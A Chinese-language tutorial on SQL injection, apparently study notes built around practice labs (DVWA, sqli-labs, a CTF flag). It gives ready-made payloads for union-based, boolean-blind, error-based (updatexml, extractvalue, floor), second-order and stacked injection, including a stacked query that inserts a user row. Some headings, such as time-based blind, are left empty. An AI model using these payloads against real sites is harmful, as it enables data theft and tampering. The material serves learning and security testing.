一、SQL注入三要素
1、用户可以对输入的参数值进行修改。
2、后端不对用户输入的参数值进行严格过滤。
3、用户修改后的参数值可以被带入后端中成功执行,并返回一定结果。
二、SQL注入原理
简单来说,用户输入的值会被插入到SQL语句中,然后发送到数据库执行,当用户输入的内容经过引号或者双引号等东西的闭合,造成用户输入的内容被解析成SQL指令去执行。
例如:用户输入的参数会被插入到$id上。
"SELECT * FROM users WHERE id=$id LIMIT 0,1"
而用户可以通过输入参数将SQL语句修改成一下语句,进而在数据库运行获得想要的数据。
"SELECT * FROM users WHERE id=-1 union select 1,database(),version() LIMIT 0,1"
SQL 注入攻击:通过构建特殊的输入作为参数传入 Web 应用程序,而这些输入大都是SQL 语法里的一些组合,通过执行SQL 语句进而执行攻击者所要的操作。
SQL 注入主要原因:程序没有细致地过滤用户输入的数据,致使非法数据入侵系统,出现开发人员预期外的事件。
三、SQL分类
四、SQL注入流程
1.判断SQL注入点
表单提交:POST 请求、GET 请求
URL 参数提交:GET 请求参数
HTTP 请求头部:Referer(IP地址源)、User_Agent(用户代理UA注入)、X-Forwared-ForCookie(XFF注入)
2.判断数据库类型
判断网站使用的是哪个数据库,常见数据库如:
MySQL、MSSQL(即SQLserver)、Oracle、Access、PostgreSQL、db2等等
常用SQL注入判断数据库方法
● 使用数据库特有的函数来判断
● 使用数据库专属符号来判断,如注释符号、多语句查询符等等
● 报错信息判断
● 数据库特性判断
端口扫描
如果可以使用Nmap对主机进行端口扫描,可以根据是否开启对应端口,来大概判断数据库类型。
Oracle
默认端口号:1521
SQL Server
默认端口号:1433
MySQL
默认端口号:3306
PostgreSql
默认端口号:5432
根据注释符判断
“#”是MySQL中的注释符,返回错误说明该注入点可能不是MySQL,另外也支持’-- ',和/* */注释(注意mysql使用-- 时需要后面添加空格)
“null”和“%00”是Access支持的注释。“--”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。
根据其返回的错误类型
ORACLE
ORA-01756:quoted string not properly terminated
ORA-00933:SQLcommand not properly ended
MS-SQL
Msg 170,level 15, State 1,Line 1
Line 1:Incorrect syntax near ‘foo
Msg 105,level 15,state 1,Line 1
Unclose quotation mark before the character string ‘foo
MYSQL
SQL Server
基于数据库特性
某些函数为数据库所特有,可以判断通过执行特殊的函数来判断数据库类型。
MYSQL的系统表
information_schema
select * from information_schema.COLUMNS
//查询系统表结构
表名 | 注释 |
schemata | 提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表 |
tables | 提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema、表类型、表引擎、创建时间等信息。show tables from schemaname的结果取之此表 |
columns | 提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。show columns from schemaname.tablename的结果取之此表 |
MYSQL的注释方式
--%20(url编码%20相当于空格,相当于--+)、#(在url里不可用)
3.判断参数类型
判断闭合方式
使用双引号”、单引号‘、括号)等,判断参数的闭合方式,如果是双引号,则在参数键入一个双引号会报错。如果是单引号或者括号,则对应键入单引号或括号会报错。
数值型
数值型不带任何符号,键入任何符号都会报错。
select * from user where username = 1;
字符型
字符型带符号,需要键入相对应的符号,进行闭合方式的判断。
select * from user where username = "zhangsan";
闭合:可以使得原语句参数位置结束,方便我们插入新恶意语句,使得恶意语句被当作SQL语句来命令执行。
4.基本注入方式
联合注入
通过修改闭合参数,添加修改查询SQL语句,以此获得目标信息。
a.确定查询的列数:通过构造不同的注入语句并观察返回结果的变化,逐渐增加联合查询语句中的列数,直到不再返回错误或异常。
通过Order获取确定的列数,一直尝试直到不报错。
?id=2' order by 3 --+
//1后的单引号需要根据闭合情况作出修改,--+为注释将SQL语句参数后面部分清除。
b.确定可用的列:通过构造注入语句并使用 UNION SELECT 语句,逐个测试每个列,以确定哪些列返回了有效的数据。
通过Select获取有回显的有效列
?id=-2' union select 1,2,3 --+
//1后的单引号需要根据闭合情况作出修改,--+为注释将SQL语句参数后面部分清除。
可以发现具有回显的有效列为2和3。
c.获取表数据:使用注入语句和SELECT 语句来获取表中的数据。
d.确定了具体的列数和有效回显列后,就可编写具体的联合查询语句获得相关的数据。
获取数据库名和版本信息;
?id=-1' union select 1,database(),version() --+
//1后的单引号需要根据闭合情况作出修改,--+为注释将SQL语句参数后面部分清除。
获取表名信息,其中group_concat(table_name)
是一个MySQL函数,用于将查询结果中的多个行合并成一个字符串,并以逗号分隔;
?id=1' union select 1,group_concat(table_name) from information_schema.tables where TABLE_SCHEMA=database()#
//1后的单引号需要根据闭合情况作出修改,#为注释将SQL语句参数后面部分清除。
获取表内的列名信息
1' union select 1,group_concat(COLUMN_NAME) from information_schema.columns where TABLE_NAME='users' and TABLE_SCHEMA='dvwa'#
//1后的单引号需要根据闭合情况作出修改,#为注释将SQL语句参数后面部分清除。
布尔盲注
布尔盲注,与普通注入的区别在于“盲注”。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功,即:返回查询语句的布尔值。因此,盲注要盲猜试错。由于只有返回的布尔值,往往查询非常复杂,一般使用脚本来穷举试错。
1.盲注思路
盲注需要考虑多种情况,一般思路如下:
- 爆库名长度
- 根据库名长度爆库名
- 对当前库爆表数量
- 根据库名和表数量爆表名长度
- 根据表名长度爆表名
- 对表爆列数量
- 根据表名和列数量爆列名长度
- 根据列名长度爆列名
- 根据列名爆数据值
2.盲注原理
正确的情况和错误的情况返回的页面不一样
?id=3' and 1=1 --+
//1后的单引号需要根据闭合情况作出修改,--+为注释将SQL语句参数后面部分清除。
上面是结果为真页面
?id=3' and 1=2 --+
//1后的单引号需要根据闭合情况作出修改,--+为注释将SQL语句参数后面部分清除。
上面是结果为假页面
通过穷举,验证真假,可以猜出数据库的信息。
3.盲注常用函数
substr(str,from,length)
:返回从下标为from截取长度为length的str子串。首字符下标为1。
length(str)
:返回str串长度
4.盲注步骤
爆数据库名长度
首先,通过循环i从1到无穷,使用length(database()) = i
获取库名长度,i是长度,直到返回页面提示query_success即猜测成功
?id=1' and length(database())>1 --+
?id=1' and length(database())>2 --+
?id=1' and length(database())>3 --+
....
//单引号需要根据闭合情况作出修改,--+为注释将SQL语句参数后面部分清除。
这里推荐用二分查找法找出具体的长度信息
根据库名长度爆库名
获得库名长度i后,使用substr(database(),i,1)
将库名切片,循环i次,i是字符下标,每次循环要遍历字母表[a-z]作比较,即依次猜每位字符。注意substr(database,i,1),i从1开始(第i个字符)
?id=1' and substr(database(),1,1)='a' --+//1后单引号需要根据闭合情况作出修改,--+为注释将SQL语句参数后面部分清除。
这部分可以写脚本进行自动化测试。
对当前库爆表数量
下一步是获取数据库内的表数量,使用mysql的查询语句select COUNT(*)
。同样,要一个1到无穷的循环。
?id=1' and (select COUNT(*) from information_schema.tables where table_schema=database())=1 --+//1后单引号需要根据闭合情况作出修改,--+为注释将SQL语句参数后面部分清除。
根据库名和表数量爆表名长度
得到表数量i后,i就是循环次数,i是表的下标-1,大循环i次(遍历所有表),这里的i从0开始,使用limit i ,1
限定是第几张表,内嵌循环j从1到无穷(穷举所有表名长度可能性)尝试获取每个表的表名长度。
?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=1 --+
//1后单引号需要根据闭合情况作出修改,--+为注释将SQL语句参数后面部分清除。
//limit 0,1 表示从第0条记录开始,取出1条结果。MYSQL中索引从0开始,所以取出的是第0条记录。
//要有两个括号
根据表名长度爆表名
再大循环i次(遍历所有表),内嵌循环j次(表名的所有字符),i是表下标-1,j是字符下标,再内嵌循环k从a到z(假设表名全是小写英文字符)尝试获取每个表的表名。
?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='a' --+
//1后单引号需要根据闭合情况作出修改,--+为注释将SQL语句参数后面部分清除。
//limit 0,1:其中0可修改,用于遍历所有表,从0开始,到表数量-1。
//substr(str,from,length):from可以从1遍历到表长度,length固定为1。
//再遍历等于a到z
对表爆列数量
操作同对当前库爆表数量的步骤,只是要查询的表为information_schema.columns。
?id=1' and (select COUNT(*) from information_schema.columns where table_schema=database() and table_name='flag')=1 --+
//flag要改为上一步获得的表名
//1后单引号需要根据闭合情况作出修改,--+为注释将SQL语句参数后面部分清除。
根据表名和列数量爆列名长度
操作同对当前库爆表名长度的步骤,遍历0~列数-1
?id=1' and length((select COLUMN_NAME from information_schema.columns where table_schema='dvwa' and table_name='users' limit i,1))=1 --+
//1后单引号需要根据闭合情况作出修改,--+为注释将SQL语句参数后面部分清除。
根据列名长度爆列名
操作同对当前库爆表名的步骤
?id=1' and substr((select columns_name from information_schema.columns where table_schema=database() and table_name='flag' limit i,1),j,1)='a' --+
//i遍历列0~列数-1
//j遍历列各个字符1~列长度
根据列名爆数据
flag有固定的格式,以右花括号结束,假设flag有小写英文字母、下划线、花括号构成,由于不知道flag长度,要一个无限循环,定义计数符j,内嵌循环i遍历小写、下划线和花括号,匹配到字符后j++,出循环的条件是当前i是右花括号,即flag结束。
?id=1' and substr((select flag from sqli.flag limit i,1),j,1)='}' --+
//遍历flag列的每一行查看是否符合flag的格式,符合即可得出答案。
//i从0~行数-1
//j从1到字符串长度
时间盲注:
报错注入:
通过在报错信息里执行数据库函数,令和报错信息回显出来,从而获取目标数据的方法。
updatexml()报错函数
MySQL提供了一个 updatexml() 函数,负责修改查询到的内容。该函数有三个参数,其中第二个参数都要求是符合xpath语法的字符串,如果不满足要求(当第二个参数包含特殊符号(一定要用ASCII码,例如: 0x7e)时),则会报错,并且将查询结果放在报错信息里。
updataxml(第一个参数,第二个参数,第三个参数)
第一个参数(要更新XML数据类型的列或属性)和第三个参数(要更新成的值)的值可以是任意数字,和字符串(要用引号括起来)。
第三个参数(要修改的XML路径)的值可以是要查询的信息,要查询的信息需要用拼接函数将特殊字符和查询语句拼接起来放到第二个参数才行。
!查询信息具体的select语句可以参考联合查询。!
updatexml()函数长度限制
报错内容长度限制不能超过32个字符,常用的解决方法有:
1、substr()截取字符:三个参数,要切取的字符串,起始索引(从1开始),切取长度。
?id=1%27%20and%20updatexml(1,concat(0x7d,substr((select%20id%20from%20users%20limit%2001),1,1)),3)%20--%20
//%20为空格
//%27为单引号
2、limit分页:需要配合关键字select使用,且查询语句需要单独用括号括起来。
?id=1%27%20and%20updatexml(1,concat(0x7d,(select%20database()%20limit%200),1),3)%20--%20
extractvalue()报错函数
MySQL提供了一个 extractvalue() 函数,负责在 xml 文档中按照 xpath 语法查询节点内容。该函数有二个参数,其中第二个参数都要求是符合xpath语法的字符串,如果不满足要求(当第二个参数包含特殊符号(一定要用ASCII码,例如: 0x7e)时),则会报错,并且将查询结果放在报错信息里。
extractvalue(第一个参数,第二个参数)
第一个参数(要查询XML数据类型的列或属性)的值可以是任意数字,和字符串(要用引号括起来)。
第二个参数(要查询的XML路径)的值可以是要查询的信息,要查询的信息需要用拼接函数将特殊字符和查询语句拼接起来放到第二个参数才行。
!查询信息具体的select语句可以参考联合查询。!
extractvalue()报错函数只比 updatexml()报错函数少填写一个参数,其它和 updatexml()报错函数一样,最大报错信息也是32字符。
floor(rand(0)*2)报错函数
MySQL提供了一个 floor() 函数,返回小于等于该值的最大整数.。原理是因为select配合group by 的使用,但因为floor(rand(0)*2)的重复性,导致group by语句出错。
使用此报错函数必须保证查询的表必须大于三条数据。
payload的大致格式:
1' and (select 1 from (select count(*),concat(0x23,(slelect语句),0x23,floor(rand(0)*2)) as x from "一个足够大的表" group by x) as y) --+
5.特殊注入
二次注入:
二次注入是指用户输入的数据经过处理后存入数据库,再次从数据库中被读取出来作为查询语句的参数,从而形成恶意代码,使得攻击者获得想要的数据。二次注入是SQL注入的一种,但是比普通SQL注入利用更加困难,利用门槛更高。普通注入数据直接进入到 SQL 查询中,而二次注入则是输入数据经处理后存储,取出后,再次进入到 SQL 查询。
原理:
用户输入数据库的数据会被转义,但读出数据库的数据不会被转义,因此造成的漏洞。
用户写的用户名为admin'#,被存入数据库,再次读取出来时,作为以下SQL的参数。
SELECT username from users where username='$id'
再次读取出来作为作为SQL的参数,就会造成以上的SQL语句变成以下的SQL语句,变成查询admin的用户了。在登录进admin'#用户时,修改密码时候,就可能造成修改的是admin用户的密码。
SELECT username from users where username='admin'#'
以sqli-lab24为例
1、正常来说无法通过注入来登录admin,因为用户输入会被转义。
2、注册admin ‘#。
3、登录admin ‘# 转义成admin\’#,则登录的是admin’#。
4、修改admin ‘#的登录密码,由于这里不会被转义,故可以直接利用,这个时候就变成了修改了admin的密码了。
堆叠注入:
原理:php代码使用了mysql_multi_query() 函数,其支持多条SQL语句同时执行,SQL语句用分号;间隔。
payload的大致格式: --+将代码写的sql后面部分注释掉了,1后面的单引号补全了缺少的单引号(闭合),分号;结束了前面的查询语句。后面写入新的SQL执行语句。
?id=1';insert into users(id,username,password) value (77,'acca','bbc')--+
五、参考资料
最常见的SQL报错注入函数(floor、updatexml、extractvalue)及payload总结_报错注入payload-CSDN博客
SQL注入报错注入之floor()报错注入原理分析_sql注入floor-CSDN博客
SQL注入——二次注入的原理 利用以及防御_sql二次注入原理-CSDN博客
SQL注入之堆叠注入_堆叠注入函数-CSDN博客